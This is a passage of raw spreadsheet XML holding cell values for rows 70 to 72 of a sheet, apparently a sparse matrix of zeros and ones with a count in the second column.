      <c r="OH70">
        <v>0</v>
      </c>
      <c r="OI70">
        <v>0</v>
      </c>
      <c r="OJ70">
        <v>0</v>
      </c>
      <c r="OK70">
        <v>0</v>
      </c>
      <c r="OL70">
        <v>0</v>
      </c>
      <c r="OM70">
        <v>0</v>
      </c>
      <c r="ON70">
        <v>0</v>
      </c>
      <c r="OO70">
        <v>0</v>
      </c>
      <c r="OP70">
        <v>0</v>
      </c>
      <c r="OQ70">
        <v>0</v>
      </c>
      <c r="OR70">
        <v>0</v>
      </c>
      <c r="OS70">
        <v>0</v>
      </c>
      <c r="OT70">
        <v>0</v>
      </c>
      <c r="OU70">
        <v>0</v>
      </c>
      <c r="OV70">
        <v>0</v>
      </c>
      <c r="OW70">
        <v>0</v>
      </c>
      <c r="OX70">
        <v>0</v>
      </c>
      <c r="OY70">
        <v>0</v>
      </c>
      <c r="OZ70">
        <v>0</v>
      </c>
      <c r="PA70">
        <v>0</v>
      </c>
      <c r="PB70">
        <v>0</v>
      </c>
      <c r="PC70">
        <v>0</v>
      </c>
      <c r="PD70">
        <v>0</v>
      </c>
      <c r="PE70">
        <v>0</v>
      </c>
      <c r="PF70">
        <v>0</v>
      </c>
      <c r="PG70">
        <v>0</v>
      </c>
      <c r="PH70">
        <v>0</v>
      </c>
      <c r="PI70">
        <v>0</v>
      </c>
      <c r="PJ70">
        <v>0</v>
      </c>
      <c r="PK70">
        <v>0</v>
      </c>
      <c r="PL70">
        <v>0</v>
      </c>
      <c r="PM70">
        <v>0</v>
      </c>
      <c r="PN70">
        <v>0</v>
      </c>
      <c r="PO70">
        <v>0</v>
      </c>
      <c r="PP70">
        <v>0</v>
      </c>
      <c r="PQ70">
        <v>0</v>
      </c>
      <c r="PR70">
        <v>1</v>
      </c>
      <c r="PS70">
        <v>0</v>
      </c>
      <c r="PT70">
        <v>0</v>
      </c>
      <c r="PU70">
        <v>0</v>
      </c>
      <c r="PV70">
        <v>0</v>
      </c>
      <c r="PW70">
        <v>0</v>
      </c>
      <c r="PX70">
        <v>0</v>
      </c>
      <c r="PY70">
        <v>0</v>
      </c>
      <c r="PZ70">
        <v>0</v>
      </c>
      <c r="QA70">
        <v>0</v>
      </c>
      <c r="QB70">
        <v>0</v>
      </c>
      <c r="QC70">
        <v>0</v>
      </c>
      <c r="QD70">
        <v>0</v>
      </c>
      <c r="QE70">
        <v>0</v>
      </c>
      <c r="QF70">
        <v>0</v>
      </c>
      <c r="QG70">
        <v>0</v>
      </c>
      <c r="QH70">
        <v>0</v>
      </c>
      <c r="QI70">
        <v>0</v>
      </c>
      <c r="QJ70">
        <v>0</v>
      </c>
      <c r="QK70">
        <v>0</v>
      </c>
      <c r="QL70">
        <v>0</v>
      </c>
      <c r="QM70">
        <v>0</v>
      </c>
      <c r="QN70">
        <v>0</v>
      </c>
      <c r="QO70">
        <v>0</v>
      </c>
      <c r="QP70">
        <v>0</v>
      </c>
      <c r="QQ70">
        <v>0</v>
      </c>
      <c r="QR70">
        <v>0</v>
      </c>
      <c r="QS70">
        <v>0</v>
      </c>
      <c r="QT70">
        <v>0</v>
      </c>
      <c r="QU70">
        <v>0</v>
      </c>
      <c r="QV70">
        <v>0</v>
      </c>
      <c r="QW70">
        <v>0</v>
      </c>
      <c r="QX70">
        <v>0</v>
      </c>
      <c r="QY70">
        <v>0</v>
      </c>
      <c r="QZ70">
        <v>0</v>
      </c>
      <c r="RA70">
        <v>0</v>
      </c>
      <c r="RB70">
        <v>0</v>
      </c>
      <c r="RC70">
        <v>0</v>
      </c>
      <c r="RD70">
        <v>0</v>
      </c>
      <c r="RE70">
        <v>0</v>
      </c>
      <c r="RF70">
        <v>0</v>
      </c>
      <c r="RG70">
        <v>0</v>
      </c>
      <c r="RH70">
        <v>0</v>
      </c>
      <c r="RI70">
        <v>0</v>
      </c>
      <c r="RJ70">
        <v>0</v>
      </c>
      <c r="RK70">
        <v>0</v>
      </c>
      <c r="RL70">
        <v>0</v>
      </c>
      <c r="RM70">
        <v>0</v>
      </c>
      <c r="RN70">
        <v>0</v>
      </c>
      <c r="RO70">
        <v>0</v>
      </c>
      <c r="RP70">
        <v>0</v>
      </c>
      <c r="RQ70">
        <v>0</v>
      </c>
      <c r="RR70">
        <v>0</v>
      </c>
      <c r="RS70">
        <v>0</v>
      </c>
      <c r="RT70">
        <v>0</v>
      </c>
      <c r="RU70">
        <v>0</v>
      </c>
      <c r="RV70">
        <v>0</v>
      </c>
      <c r="RW70">
        <v>0</v>
      </c>
      <c r="RX70">
        <v>0</v>
      </c>
      <c r="RY70">
        <v>0</v>
      </c>
      <c r="RZ70">
        <v>0</v>
      </c>
      <c r="SA70">
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A71" s="6" t="s">
        <v>3182</v>
      </c>
      <c r="B71">
        <v>6</v>
      </c>
      <c r="C71">
        <v>0</v>
      </c>
      <c r="D71">
        <v>0</v>
      </c>
      <c r="E71">
        <v>0</v>
      </c>
      <c r="F71">
        <v>0</v>
      </c>
      <c r="G71">
        <v>0</v>
      </c>
      <c r="H71">
        <v>0</v>
      </c>
      <c r="I71">
        <v>0</v>
      </c>
      <c r="J71">
        <v>0</v>
      </c>
      <c r="K71">
        <v>0</v>
      </c>
      <c r="L71">
        <v>0</v>
      </c>
      <c r="M71">
        <v>0</v>
      </c>
      <c r="N71">
        <v>0</v>
      </c>
      <c r="O71">
        <v>0</v>
      </c>
      <c r="P71">
        <v>0</v>
      </c>
      <c r="Q71">
        <v>0</v>
      </c>
      <c r="R71">
        <v>0</v>
      </c>
      <c r="S71">
        <v>0</v>
      </c>
      <c r="T71">
        <v>0</v>
      </c>
      <c r="U71">
        <v>1</v>
      </c>
      <c r="V71">
        <v>0</v>
      </c>
      <c r="W71">
        <v>0</v>
      </c>
      <c r="X71">
        <v>0</v>
      </c>
      <c r="Y71">
        <v>0</v>
      </c>
      <c r="Z71">
        <v>0</v>
      </c>
      <c r="AA71">
        <v>0</v>
      </c>
      <c r="AB71">
        <v>0</v>
      </c>
      <c r="AC71">
        <v>0</v>
      </c>
      <c r="AD71">
        <v>0</v>
      </c>
      <c r="AE71">
        <v>0</v>
      </c>
      <c r="AF71">
        <v>0</v>
      </c>
      <c r="AG71">
        <v>0</v>
      </c>
      <c r="AH71">
        <v>0</v>
      </c>
      <c r="AI71">
        <v>0</v>
      </c>
      <c r="AJ71">
        <v>0</v>
      </c>
      <c r="AK71">
        <v>0</v>
      </c>
      <c r="AL71">
        <v>0</v>
      </c>
      <c r="AM71">
        <v>0</v>
      </c>
      <c r="AN71">
        <v>1</v>
      </c>
      <c r="AO71">
        <v>0</v>
      </c>
      <c r="AP71">
        <v>0</v>
      </c>
      <c r="AQ71">
        <v>0</v>
      </c>
      <c r="AR71">
        <v>0</v>
      </c>
      <c r="AS71">
        <v>0</v>
      </c>
      <c r="AT71">
        <v>0</v>
      </c>
      <c r="AU71">
        <v>0</v>
      </c>
      <c r="AV71">
        <v>0</v>
      </c>
      <c r="AW71">
        <v>0</v>
      </c>
      <c r="AX71">
        <v>0</v>
      </c>
      <c r="AY71">
        <v>0</v>
      </c>
      <c r="AZ71">
        <v>0</v>
      </c>
      <c r="BA71">
        <v>0</v>
      </c>
      <c r="BB71">
        <v>0</v>
      </c>
      <c r="BC71">
        <v>0</v>
      </c>
      <c r="BD71">
        <v>0</v>
      </c>
      <c r="BE71">
        <v>0</v>
      </c>
      <c r="BF71">
        <v>0</v>
      </c>
      <c r="BG71">
        <v>0</v>
      </c>
      <c r="BH71">
        <v>0</v>
      </c>
      <c r="BI71">
        <v>0</v>
      </c>
      <c r="BJ71">
        <v>0</v>
      </c>
      <c r="BK71">
        <v>0</v>
      </c>
      <c r="BL71">
        <v>0</v>
      </c>
      <c r="BM71">
        <v>0</v>
      </c>
      <c r="BN71">
        <v>0</v>
      </c>
      <c r="BO71">
        <v>0</v>
      </c>
      <c r="BP71">
        <v>0</v>
      </c>
      <c r="BQ71">
        <v>0</v>
      </c>
      <c r="BR71">
        <v>0</v>
      </c>
      <c r="BS71">
        <v>0</v>
      </c>
      <c r="BT71">
        <v>0</v>
      </c>
      <c r="BU71">
        <v>0</v>
      </c>
      <c r="BV71">
        <v>0</v>
      </c>
      <c r="BW71">
        <v>0</v>
      </c>
      <c r="BX71">
        <v>0</v>
      </c>
      <c r="BY71">
        <v>0</v>
      </c>
      <c r="BZ71">
        <v>0</v>
      </c>
      <c r="CA71">
        <v>0</v>
      </c>
      <c r="CB71">
        <v>0</v>
      </c>
      <c r="CC71">
        <v>0</v>
      </c>
      <c r="CD71">
        <v>0</v>
      </c>
      <c r="CE71">
        <v>0</v>
      </c>
      <c r="CF71">
        <v>0</v>
      </c>
      <c r="CG71">
        <v>0</v>
      </c>
      <c r="CH71">
        <v>0</v>
      </c>
      <c r="CI71">
        <v>0</v>
      </c>
      <c r="CJ71">
        <v>0</v>
      </c>
      <c r="CK71">
        <v>0</v>
      </c>
      <c r="CL71">
        <v>0</v>
      </c>
      <c r="CM71">
        <v>0</v>
      </c>
      <c r="CN71">
        <v>0</v>
      </c>
      <c r="CO71">
        <v>0</v>
      </c>
      <c r="CP71">
        <v>0</v>
      </c>
      <c r="CQ71">
        <v>0</v>
      </c>
      <c r="CR71">
        <v>0</v>
      </c>
      <c r="CS71">
        <v>0</v>
      </c>
      <c r="CT71">
        <v>0</v>
      </c>
      <c r="CU71">
        <v>0</v>
      </c>
      <c r="CV71">
        <v>0</v>
      </c>
      <c r="CW71">
        <v>0</v>
      </c>
      <c r="CX71">
        <v>0</v>
      </c>
      <c r="CY71">
        <v>0</v>
      </c>
      <c r="CZ71">
        <v>0</v>
      </c>
      <c r="DA71">
        <v>0</v>
      </c>
      <c r="DB71">
        <v>0</v>
      </c>
      <c r="DC71">
        <v>0</v>
      </c>
      <c r="DD71">
        <v>0</v>
      </c>
      <c r="DE71">
        <v>0</v>
      </c>
      <c r="DF71">
        <v>0</v>
      </c>
      <c r="DG71">
        <v>0</v>
      </c>
      <c r="DH71">
        <v>0</v>
      </c>
      <c r="DI71">
        <v>0</v>
      </c>
      <c r="DJ71">
        <v>0</v>
      </c>
      <c r="DK71">
        <v>0</v>
      </c>
      <c r="DL71">
        <v>0</v>
      </c>
      <c r="DM71">
        <v>0</v>
      </c>
      <c r="DN71">
        <v>0</v>
      </c>
      <c r="DO71">
        <v>0</v>
      </c>
      <c r="DP71">
        <v>0</v>
      </c>
      <c r="DQ71">
        <v>0</v>
      </c>
      <c r="DR71">
        <v>0</v>
      </c>
      <c r="DS71">
        <v>0</v>
      </c>
      <c r="DT71">
        <v>0</v>
      </c>
      <c r="DU71">
        <v>0</v>
      </c>
      <c r="DV71">
        <v>0</v>
      </c>
      <c r="DW71">
        <v>0</v>
      </c>
      <c r="DX71">
        <v>0</v>
      </c>
      <c r="DY71">
        <v>0</v>
      </c>
      <c r="DZ71">
        <v>0</v>
      </c>
      <c r="EA71">
        <v>0</v>
      </c>
      <c r="EB71">
        <v>0</v>
      </c>
      <c r="EC71">
        <v>0</v>
      </c>
      <c r="ED71">
        <v>0</v>
      </c>
      <c r="EE71">
        <v>0</v>
      </c>
      <c r="EF71">
        <v>0</v>
      </c>
      <c r="EG71">
        <v>0</v>
      </c>
      <c r="EH71">
        <v>0</v>
      </c>
      <c r="EI71">
        <v>0</v>
      </c>
      <c r="EJ71">
        <v>0</v>
      </c>
      <c r="EK71">
        <v>0</v>
      </c>
      <c r="EL71">
        <v>0</v>
      </c>
      <c r="EM71">
        <v>0</v>
      </c>
      <c r="EN71">
        <v>0</v>
      </c>
      <c r="EO71">
        <v>0</v>
      </c>
      <c r="EP71">
        <v>0</v>
      </c>
      <c r="EQ71">
        <v>0</v>
      </c>
      <c r="ER71">
        <v>0</v>
      </c>
      <c r="ES71">
        <v>0</v>
      </c>
      <c r="ET71">
        <v>0</v>
      </c>
      <c r="EU71">
        <v>0</v>
      </c>
      <c r="EV71">
        <v>0</v>
      </c>
      <c r="EW71">
        <v>0</v>
      </c>
      <c r="EX71">
        <v>0</v>
      </c>
      <c r="EY71">
        <v>0</v>
      </c>
      <c r="EZ71">
        <v>0</v>
      </c>
      <c r="FA71">
        <v>0</v>
      </c>
      <c r="FB71">
        <v>0</v>
      </c>
      <c r="FC71">
        <v>0</v>
      </c>
      <c r="FD71">
        <v>0</v>
      </c>
      <c r="FE71">
        <v>0</v>
      </c>
      <c r="FF71">
        <v>0</v>
      </c>
      <c r="FG71">
        <v>0</v>
      </c>
      <c r="FH71">
        <v>0</v>
      </c>
      <c r="FI71">
        <v>0</v>
      </c>
      <c r="FJ71">
        <v>0</v>
      </c>
      <c r="FK71">
        <v>0</v>
      </c>
      <c r="FL71">
        <v>0</v>
      </c>
      <c r="FM71">
        <v>0</v>
      </c>
      <c r="FN71">
        <v>0</v>
      </c>
      <c r="FO71">
        <v>0</v>
      </c>
      <c r="FP71">
        <v>0</v>
      </c>
      <c r="FQ71">
        <v>0</v>
      </c>
      <c r="FR71">
        <v>0</v>
      </c>
      <c r="FS71">
        <v>0</v>
      </c>
      <c r="FT71">
        <v>0</v>
      </c>
      <c r="FU71">
        <v>0</v>
      </c>
      <c r="FV71">
        <v>0</v>
      </c>
      <c r="FW71">
        <v>0</v>
      </c>
      <c r="FX71">
        <v>0</v>
      </c>
      <c r="FY71">
        <v>0</v>
      </c>
      <c r="FZ71">
        <v>0</v>
      </c>
      <c r="GA71">
        <v>0</v>
      </c>
      <c r="GB71">
        <v>0</v>
      </c>
      <c r="GC71">
        <v>0</v>
      </c>
      <c r="GD71">
        <v>0</v>
      </c>
      <c r="GE71">
        <v>0</v>
      </c>
      <c r="GF71">
        <v>1</v>
      </c>
      <c r="GG71">
        <v>0</v>
      </c>
      <c r="GH71">
        <v>0</v>
      </c>
      <c r="GI71">
        <v>0</v>
      </c>
      <c r="GJ71">
        <v>0</v>
      </c>
      <c r="GK71">
        <v>0</v>
      </c>
      <c r="GL71">
        <v>0</v>
      </c>
      <c r="GM71">
        <v>0</v>
      </c>
      <c r="GN71">
        <v>0</v>
      </c>
      <c r="GO71">
        <v>0</v>
      </c>
      <c r="GP71">
        <v>0</v>
      </c>
      <c r="GQ71">
        <v>0</v>
      </c>
      <c r="GR71">
        <v>0</v>
      </c>
      <c r="GS71">
        <v>0</v>
      </c>
      <c r="GT71">
        <v>0</v>
      </c>
      <c r="GU71">
        <v>0</v>
      </c>
      <c r="GV71">
        <v>0</v>
      </c>
      <c r="GW71">
        <v>0</v>
      </c>
      <c r="GX71">
        <v>0</v>
      </c>
      <c r="GY71">
        <v>0</v>
      </c>
      <c r="GZ71">
        <v>0</v>
      </c>
      <c r="HA71">
        <v>0</v>
      </c>
      <c r="HB71">
        <v>0</v>
      </c>
      <c r="HC71">
        <v>0</v>
      </c>
      <c r="HD71">
        <v>0</v>
      </c>
      <c r="HE71">
        <v>0</v>
      </c>
      <c r="HF71">
        <v>0</v>
      </c>
      <c r="HG71">
        <v>0</v>
      </c>
      <c r="HH71">
        <v>0</v>
      </c>
      <c r="HI71">
        <v>0</v>
      </c>
      <c r="HJ71">
        <v>0</v>
      </c>
      <c r="HK71">
        <v>0</v>
      </c>
      <c r="HL71">
        <v>0</v>
      </c>
      <c r="HM71">
        <v>0</v>
      </c>
      <c r="HN71">
        <v>0</v>
      </c>
      <c r="HO71">
        <v>0</v>
      </c>
      <c r="HP71">
        <v>0</v>
      </c>
      <c r="HQ71">
        <v>0</v>
      </c>
      <c r="HR71">
        <v>0</v>
      </c>
      <c r="HS71">
        <v>0</v>
      </c>
      <c r="HT71">
        <v>0</v>
      </c>
      <c r="HU71">
        <v>0</v>
      </c>
      <c r="HV71">
        <v>0</v>
      </c>
      <c r="HW71">
        <v>0</v>
      </c>
      <c r="HX71">
        <v>0</v>
      </c>
      <c r="HY71">
        <v>0</v>
      </c>
      <c r="HZ71">
        <v>0</v>
      </c>
      <c r="IA71">
        <v>0</v>
      </c>
      <c r="IB71">
        <v>0</v>
      </c>
      <c r="IC71">
        <v>0</v>
      </c>
      <c r="ID71">
        <v>0</v>
      </c>
      <c r="IE71">
        <v>0</v>
      </c>
      <c r="IF71">
        <v>0</v>
      </c>
      <c r="IG71">
        <v>0</v>
      </c>
      <c r="IH71">
        <v>0</v>
      </c>
      <c r="II71">
        <v>0</v>
      </c>
      <c r="IJ71">
        <v>0</v>
      </c>
      <c r="IK71">
        <v>0</v>
      </c>
      <c r="IL71">
        <v>0</v>
      </c>
      <c r="IM71">
        <v>0</v>
      </c>
      <c r="IN71">
        <v>0</v>
      </c>
      <c r="IO71">
        <v>0</v>
      </c>
      <c r="IP71">
        <v>0</v>
      </c>
      <c r="IQ71">
        <v>0</v>
      </c>
      <c r="IR71">
        <v>0</v>
      </c>
      <c r="IS71">
        <v>0</v>
      </c>
      <c r="IT71">
        <v>0</v>
      </c>
      <c r="IU71">
        <v>0</v>
      </c>
      <c r="IV71">
        <v>0</v>
      </c>
      <c r="IW71">
        <v>0</v>
      </c>
      <c r="IX71">
        <v>0</v>
      </c>
      <c r="IY71">
        <v>0</v>
      </c>
      <c r="IZ71">
        <v>0</v>
      </c>
      <c r="JA71">
        <v>0</v>
      </c>
      <c r="JB71">
        <v>0</v>
      </c>
      <c r="JC71">
        <v>0</v>
      </c>
      <c r="JD71">
        <v>0</v>
      </c>
      <c r="JE71">
        <v>0</v>
      </c>
      <c r="JF71">
        <v>0</v>
      </c>
      <c r="JG71">
        <v>0</v>
      </c>
      <c r="JH71">
        <v>0</v>
      </c>
      <c r="JI71">
        <v>0</v>
      </c>
      <c r="JJ71">
        <v>0</v>
      </c>
      <c r="JK71">
        <v>0</v>
      </c>
      <c r="JL71">
        <v>0</v>
      </c>
      <c r="JM71">
        <v>0</v>
      </c>
      <c r="JN71">
        <v>1</v>
      </c>
      <c r="JO71">
        <v>0</v>
      </c>
      <c r="JP71">
        <v>0</v>
      </c>
      <c r="JQ71">
        <v>0</v>
      </c>
      <c r="JR71">
        <v>0</v>
      </c>
      <c r="JS71">
        <v>0</v>
      </c>
      <c r="JT71">
        <v>0</v>
      </c>
      <c r="JU71">
        <v>0</v>
      </c>
      <c r="JV71">
        <v>0</v>
      </c>
      <c r="JW71">
        <v>0</v>
      </c>
      <c r="JX71">
        <v>0</v>
      </c>
      <c r="JY71">
        <v>0</v>
      </c>
      <c r="JZ71">
        <v>0</v>
      </c>
      <c r="KA71">
        <v>0</v>
      </c>
      <c r="KB71">
        <v>0</v>
      </c>
      <c r="KC71">
        <v>0</v>
      </c>
      <c r="KD71">
        <v>0</v>
      </c>
      <c r="KE71">
        <v>0</v>
      </c>
      <c r="KF71">
        <v>0</v>
      </c>
      <c r="KG71">
        <v>0</v>
      </c>
      <c r="KH71">
        <v>0</v>
      </c>
      <c r="KI71">
        <v>0</v>
      </c>
      <c r="KJ71">
        <v>0</v>
      </c>
      <c r="KK71">
        <v>0</v>
      </c>
      <c r="KL71">
        <v>0</v>
      </c>
      <c r="KM71">
        <v>0</v>
      </c>
      <c r="KN71">
        <v>0</v>
      </c>
      <c r="KO71">
        <v>0</v>
      </c>
      <c r="KP71">
        <v>0</v>
      </c>
      <c r="KQ71">
        <v>0</v>
      </c>
      <c r="KR71">
        <v>0</v>
      </c>
      <c r="KS71">
        <v>0</v>
      </c>
      <c r="KT71">
        <v>0</v>
      </c>
      <c r="KU71">
        <v>0</v>
      </c>
      <c r="KV71">
        <v>0</v>
      </c>
      <c r="KW71">
        <v>0</v>
      </c>
      <c r="KX71">
        <v>0</v>
      </c>
      <c r="KY71">
        <v>0</v>
      </c>
      <c r="KZ71">
        <v>0</v>
      </c>
      <c r="LA71">
        <v>0</v>
      </c>
      <c r="LB71">
        <v>0</v>
      </c>
      <c r="LC71">
        <v>0</v>
      </c>
      <c r="LD71">
        <v>0</v>
      </c>
      <c r="LE71">
        <v>0</v>
      </c>
      <c r="LF71">
        <v>0</v>
      </c>
      <c r="LG71">
        <v>0</v>
      </c>
      <c r="LH71">
        <v>0</v>
      </c>
      <c r="LI71">
        <v>0</v>
      </c>
      <c r="LJ71">
        <v>0</v>
      </c>
      <c r="LK71">
        <v>0</v>
      </c>
      <c r="LL71">
        <v>0</v>
      </c>
      <c r="LM71">
        <v>0</v>
      </c>
      <c r="LN71">
        <v>0</v>
      </c>
      <c r="LO71">
        <v>0</v>
      </c>
      <c r="LP71">
        <v>1</v>
      </c>
      <c r="LQ71">
        <v>0</v>
      </c>
      <c r="LR71">
        <v>0</v>
      </c>
      <c r="LS71">
        <v>0</v>
      </c>
      <c r="LT71">
        <v>0</v>
      </c>
      <c r="LU71">
        <v>0</v>
      </c>
      <c r="LV71">
        <v>0</v>
      </c>
      <c r="LW71">
        <v>0</v>
      </c>
      <c r="LX71">
        <v>0</v>
      </c>
      <c r="LY71">
        <v>0</v>
      </c>
      <c r="LZ71">
        <v>0</v>
      </c>
      <c r="MA71">
        <v>0</v>
      </c>
      <c r="MB71">
        <v>0</v>
      </c>
      <c r="MC71">
        <v>0</v>
      </c>
      <c r="MD71">
        <v>0</v>
      </c>
      <c r="ME71">
        <v>0</v>
      </c>
      <c r="MF71">
        <v>0</v>
      </c>
      <c r="MG71">
        <v>0</v>
      </c>
      <c r="MH71">
        <v>0</v>
      </c>
      <c r="MI71">
        <v>0</v>
      </c>
      <c r="MJ71">
        <v>0</v>
      </c>
      <c r="MK71">
        <v>0</v>
      </c>
      <c r="ML71">
        <v>0</v>
      </c>
      <c r="MM71">
        <v>0</v>
      </c>
      <c r="MN71">
        <v>0</v>
      </c>
      <c r="MO71">
        <v>0</v>
      </c>
      <c r="MP71">
        <v>0</v>
      </c>
      <c r="MQ71">
        <v>0</v>
      </c>
      <c r="MR71">
        <v>0</v>
      </c>
      <c r="MS71">
        <v>0</v>
      </c>
      <c r="MT71">
        <v>0</v>
      </c>
      <c r="MU71">
        <v>0</v>
      </c>
      <c r="MV71">
        <v>0</v>
      </c>
      <c r="MW71">
        <v>0</v>
      </c>
      <c r="MX71">
        <v>0</v>
      </c>
      <c r="MY71">
        <v>0</v>
      </c>
      <c r="MZ71">
        <v>0</v>
      </c>
      <c r="NA71">
        <v>0</v>
      </c>
      <c r="NB71">
        <v>0</v>
      </c>
      <c r="NC71">
        <v>0</v>
      </c>
      <c r="ND71">
        <v>0</v>
      </c>
      <c r="NE71">
        <v>0</v>
      </c>
      <c r="NF71">
        <v>0</v>
      </c>
      <c r="NG71">
        <v>0</v>
      </c>
      <c r="NH71">
        <v>0</v>
      </c>
      <c r="NI71">
        <v>0</v>
      </c>
      <c r="NJ71">
        <v>0</v>
      </c>
      <c r="NK71">
        <v>0</v>
      </c>
      <c r="NL71">
        <v>0</v>
      </c>
      <c r="NM71">
        <v>0</v>
      </c>
      <c r="NN71">
        <v>0</v>
      </c>
      <c r="NO71">
        <v>0</v>
      </c>
      <c r="NP71">
        <v>0</v>
      </c>
      <c r="NQ71">
        <v>0</v>
      </c>
      <c r="NR71">
        <v>0</v>
      </c>
      <c r="NS71">
        <v>0</v>
      </c>
      <c r="NT71">
        <v>0</v>
      </c>
      <c r="NU71">
        <v>1</v>
      </c>
      <c r="NV71">
        <v>0</v>
      </c>
      <c r="NW71">
        <v>0</v>
      </c>
      <c r="NX71">
        <v>0</v>
      </c>
      <c r="NY71">
        <v>0</v>
      </c>
      <c r="NZ71">
        <v>0</v>
      </c>
      <c r="OA71">
        <v>0</v>
      </c>
      <c r="OB71">
        <v>0</v>
      </c>
      <c r="OC71">
        <v>0</v>
      </c>
      <c r="OD71">
        <v>0</v>
      </c>
      <c r="OE71">
        <v>0</v>
      </c>
      <c r="OF71">
        <v>0</v>
      </c>
      <c r="OG71">
        <v>0</v>
      </c>
      <c r="OH71">
        <v>0</v>
      </c>
      <c r="OI71">
        <v>0</v>
      </c>
      <c r="OJ71">
        <v>0</v>
      </c>
      <c r="OK71">
        <v>0</v>
      </c>
      <c r="OL71">
        <v>0</v>
      </c>
      <c r="OM71">
        <v>0</v>
      </c>
      <c r="ON71">
        <v>0</v>
      </c>
      <c r="OO71">
        <v>0</v>
      </c>
      <c r="OP71">
        <v>0</v>
      </c>
      <c r="OQ71">
        <v>0</v>
      </c>
      <c r="OR71">
        <v>0</v>
      </c>
      <c r="OS71">
        <v>0</v>
      </c>
      <c r="OT71">
        <v>0</v>
      </c>
      <c r="OU71">
        <v>0</v>
      </c>
      <c r="OV71">
        <v>0</v>
      </c>
      <c r="OW71">
        <v>0</v>
      </c>
      <c r="OX71">
        <v>0</v>
      </c>
      <c r="OY71">
        <v>0</v>
      </c>
      <c r="OZ71">
        <v>0</v>
      </c>
      <c r="PA71">
        <v>0</v>
      </c>
      <c r="PB71">
        <v>0</v>
      </c>
      <c r="PC71">
        <v>0</v>
      </c>
      <c r="PD71">
        <v>0</v>
      </c>
      <c r="PE71">
        <v>0</v>
      </c>
      <c r="PF71">
        <v>0</v>
      </c>
      <c r="PG71">
        <v>0</v>
      </c>
      <c r="PH71">
        <v>0</v>
      </c>
      <c r="PI71">
        <v>0</v>
      </c>
      <c r="PJ71">
        <v>0</v>
      </c>
      <c r="PK71">
        <v>0</v>
      </c>
      <c r="PL71">
        <v>0</v>
      </c>
      <c r="PM71">
        <v>0</v>
      </c>
      <c r="PN71">
        <v>0</v>
      </c>
      <c r="PO71">
        <v>0</v>
      </c>
      <c r="PP71">
        <v>0</v>
      </c>
      <c r="PQ71">
        <v>0</v>
      </c>
      <c r="PR71">
        <v>0</v>
      </c>
      <c r="PS71">
        <v>0</v>
      </c>
      <c r="PT71">
        <v>0</v>
      </c>
      <c r="PU71">
        <v>0</v>
      </c>
      <c r="PV71">
        <v>0</v>
      </c>
      <c r="PW71">
        <v>0</v>
      </c>
      <c r="PX71">
        <v>0</v>
      </c>
      <c r="PY71">
        <v>0</v>
      </c>
      <c r="PZ71">
        <v>0</v>
      </c>
      <c r="QA71">
        <v>0</v>
      </c>
      <c r="QB71">
        <v>0</v>
      </c>
      <c r="QC71">
        <v>0</v>
      </c>
      <c r="QD71">
        <v>0</v>
      </c>
      <c r="QE71">
        <v>0</v>
      </c>
      <c r="QF71">
        <v>0</v>
      </c>
      <c r="QG71">
        <v>0</v>
      </c>
      <c r="QH71">
        <v>0</v>
      </c>
      <c r="QI71">
        <v>0</v>
      </c>
      <c r="QJ71">
        <v>0</v>
      </c>
      <c r="QK71">
        <v>0</v>
      </c>
      <c r="QL71">
        <v>0</v>
      </c>
      <c r="QM71">
        <v>0</v>
      </c>
      <c r="QN71">
        <v>0</v>
      </c>
      <c r="QO71">
        <v>0</v>
      </c>
      <c r="QP71">
        <v>0</v>
      </c>
      <c r="QQ71">
        <v>0</v>
      </c>
      <c r="QR71">
        <v>0</v>
      </c>
      <c r="QS71">
        <v>0</v>
      </c>
      <c r="QT71">
        <v>0</v>
      </c>
      <c r="QU71">
        <v>0</v>
      </c>
      <c r="QV71">
        <v>0</v>
      </c>
      <c r="QW71">
        <v>0</v>
      </c>
      <c r="QX71">
        <v>0</v>
      </c>
      <c r="QY71">
        <v>0</v>
      </c>
      <c r="QZ71">
        <v>0</v>
      </c>
      <c r="RA71">
        <v>0</v>
      </c>
      <c r="RB71">
        <v>0</v>
      </c>
      <c r="RC71">
        <v>0</v>
      </c>
      <c r="RD71">
        <v>0</v>
      </c>
      <c r="RE71">
        <v>0</v>
      </c>
      <c r="RF71">
        <v>0</v>
      </c>
      <c r="RG71">
        <v>0</v>
      </c>
      <c r="RH71">
        <v>0</v>
      </c>
      <c r="RI71">
        <v>0</v>
      </c>
      <c r="RJ71">
        <v>0</v>
      </c>
      <c r="RK71">
        <v>0</v>
      </c>
      <c r="RL71">
        <v>0</v>
      </c>
      <c r="RM71">
        <v>0</v>
      </c>
      <c r="RN71">
        <v>0</v>
      </c>
      <c r="RO71">
        <v>0</v>
      </c>
      <c r="RP71">
        <v>0</v>
      </c>
      <c r="RQ71">
        <v>0</v>
      </c>
      <c r="RR71">
        <v>0</v>
      </c>
      <c r="RS71">
        <v>0</v>
      </c>
      <c r="RT71">
        <v>0</v>
      </c>
      <c r="RU71">
        <v>0</v>
      </c>
      <c r="RV71">
        <v>0</v>
      </c>
      <c r="RW71">
        <v>0</v>
      </c>
      <c r="RX71">
        <v>0</v>
      </c>
      <c r="RY71">
        <v>0</v>
      </c>
      <c r="RZ71">
        <v>0</v>
      </c>
      <c r="SA71">
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A72" s="6" t="s">
        <v>3187</v>
      </c>
      <c r="B72">
        <v>56</v>
      </c>
      <c r="C72">
        <v>0</v>
      </c>
      <c r="D72">
        <v>0</v>
      </c>
      <c r="E72">
        <v>0</v>
      </c>
      <c r="F72">
        <v>1</v>
      </c>
      <c r="G72">
        <v>0</v>
      </c>
      <c r="H72">
        <v>0</v>
      </c>
      <c r="I72">
        <v>0</v>
      </c>
      <c r="J72">
        <v>0</v>
      </c>
      <c r="K72">
        <v>0</v>
      </c>
      <c r="L72">
        <v>0</v>
      </c>
      <c r="M72">
        <v>0</v>
      </c>
      <c r="N72">
        <v>0</v>
      </c>
      <c r="O72">
        <v>1</v>
      </c>
      <c r="P72">
        <v>0</v>
      </c>
      <c r="Q72">
        <v>0</v>
      </c>
      <c r="R72">
        <v>1</v>
      </c>
      <c r="S72">
        <v>0</v>
      </c>
      <c r="T72">
        <v>0</v>
      </c>
      <c r="U72">
        <v>0</v>
      </c>
      <c r="V72">
        <v>0</v>
      </c>
      <c r="W72">
        <v>1</v>
      </c>
      <c r="X72">
        <v>0</v>
      </c>
      <c r="Y72">
        <v>0</v>
      </c>
      <c r="Z72">
        <v>0</v>
      </c>
      <c r="AA72">
        <v>0</v>
      </c>
      <c r="AB72">
